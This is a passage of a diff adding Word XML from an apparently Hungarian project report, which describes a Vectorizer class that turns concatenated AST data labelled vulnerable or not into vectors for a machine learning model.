+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> által</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, majd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">manuálisan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felcímkézem őket, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t dolgozza fel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Kifejtve a fájl főbb metódusait:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>__</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>__</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Vectorizer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> osztály konstruktora</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kér egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>fájl nevet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>filename</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">annak a felső határát, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy sorban </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hány szó fordul elő </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_vocab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a felső határát, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hány szó van </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ténylegesen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>va van egy számláló (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>), két szótár (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">word2index, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indextoword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>táblázat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) és a kimeneti vektoroknak egy-egy változó (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>X, y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>collectVocab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">etódus, ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> teszi a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0.oszlopá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nak szavait </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>előfordulási szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>uk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>at, utóbbi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szerint csökkenő sorrendben.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>createLookupTables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>etódus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">változóba teszi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szavait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sorrendnek megfelelően </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2-től </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indexelve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indexet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> társít hozzájuk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nulladik és első index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a *** és ismeretlen szavakhoz van fenntartva</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">word2index </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">index, az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>index2word-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>be pedig index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">formában </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kerülnek be a szavak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az indexükkel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>createVectors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metódus, ami ciklussal végigmegy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egyrészt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0.oszlopának</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2indenx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-beli</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> indexet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
